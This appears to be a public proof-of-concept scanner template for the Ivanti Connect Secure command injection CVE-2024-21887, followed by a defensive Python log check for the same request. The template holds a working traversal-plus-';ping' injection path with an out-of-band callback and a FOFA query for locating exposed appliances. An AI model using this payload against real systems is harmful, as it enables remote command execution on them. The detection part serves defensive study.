A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
fofa: body="welcome.cgi?p=logo"
PoC code [public]
id: CVE-2024-21887
info:
  name: Ivanti Connect Secure 远程命令注入
  author: zan8in
  severity: critical
  verified: true
  description: |-
    A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
    fofa: body="welcome.cgi?p=logo"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21887
  tags: ivanti,rce,cve,cve2024
  created: 2024/02/01
set:
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: GET
      path: /api/v1/totp/user-backup-code/../../license/keys-status/%3bping%20{{oobDNS}}
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()
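
A defender-side log check for the request shape used in the PoC above, as an added example (not part of the original PoC or of any Ivanti tooling): it percent-decodes each logged request target, resolves dot segments, and flags requests that reach /api/v1/license/keys-status/ through traversal or carry shell metacharacters in the trailing segment. The combined-log line format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

SINK = "/api/v1/license/keys-status/"      # endpoint named in the PoC path
SHELL_META = re.compile(r"[;|&`$<>]")      # shell metacharacters
# Assumed combined-log request field: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IPs, placeholder host oob.example).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2024:10:00:01 +0000] '
    '"GET /api/v1/license/keys-status/ABC123 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Feb/2024:10:00:05 +0000] '
    '"GET /api/v1/totp/user-backup-code/../../license/keys-status/'
    '%3bping%20oob.example HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Feb/2024:10:00:09 +0000] '
    '"GET /welcome.cgi?p=logo HTTP/1.1" 200 2048',
]


def classify(target):
    """Return the reasons a request target is suspicious ([] means clean)."""
    path = unquote(target.split("?", 1)[0])  # drop query, percent-decode once
    reasons = []
    if "/../" in path or path.endswith("/.."):
        reasons.append("traversal")
    resolved = posixpath.normpath(path)      # collapse dot segments
    if resolved.startswith(SINK):
        if not path.startswith(SINK):
            reasons.append("sink-via-traversal")
        if SHELL_META.search(resolved[len(SINK):]):
            reasons.append("shell-metachar")
    return reasons


def scan(lines):
    """Return (line_number, reasons) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        reasons = classify(match.group("target")) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits


if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

Matching on the resolved path rather than the raw string means the check still fires when the traversal starts from an API route other than the one in the PoC.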